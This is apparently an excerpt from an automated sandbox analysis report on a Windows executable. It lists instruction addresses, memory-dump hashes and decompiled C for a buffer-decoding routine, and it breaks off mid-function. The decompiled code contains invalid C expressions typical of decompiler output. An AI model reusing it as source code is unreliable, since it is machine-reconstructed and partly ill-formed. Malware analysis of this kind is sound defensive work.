                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x00000000
                                                                                                        0x004061be
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x00000000
                                                                                                        0x00406509
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x00000000
                                                                                                        0x0040679a
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00000000
                                                                                                        0x0040690d
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                        • Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
                                                                                                        • Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                        • Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E00405F82(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
